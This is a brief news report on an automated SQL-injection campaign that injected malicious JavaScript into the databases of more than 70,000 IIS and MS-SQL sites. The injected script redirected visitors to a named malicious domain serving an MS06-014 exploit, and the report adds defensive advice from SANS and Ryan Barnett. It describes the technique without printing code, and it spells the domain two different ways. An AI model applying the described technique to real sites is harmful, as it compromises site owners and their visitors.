Advertisement
The attack, says SANS, is similar to a smaller SQL-injection attack seen in
November. At least 70,000 sites were compromised in a short period of time,
leading some to speculate this was an automated attack.
From logs files,
the attack code appears to exploit a variety of SQL injection vulnerabilities
existing on Web sites using Microsoft SQL or Microsoft IIS. On the vulnerable
sites, malicious JavaScript is injected into all variable character fields and
text fields in the SQL database such that when visitors hit the site, their
browsers, if vulnerable, are then redirected to another domain--in this case,
us8010.com.
Roger Thompson, chief research officer at Grisoft,
identified one of the exploits served at the malicious server as taking
advantage of MS06-014, a Microsoft Data Access Components vulnerability that
Microsoft patched in September 2006. He also noted that "this domain
uc8010(dot)com was registered just a few days ago (Dec 28), and yet, at one
point Google showed script injections pointing to it were showing up on over 70k
domains." Yet by January 5, most of these domains had already been cleaned.
What's interesting about this attack, aside from its automation, is that
the SQL injection script is given in terms of a CAST statement, code that
converts one data type to another. Ryan Barnett has provided a decoded version
of this attack.
Barnett suggests that to protect against this attack a
Web site should be front-ended by an Apache proxy and then back-ended by ISS or
MS-SQL. SANS says other methods, such as blocking CAST statements, would also be
effective
Source: www.webhostdir.com 
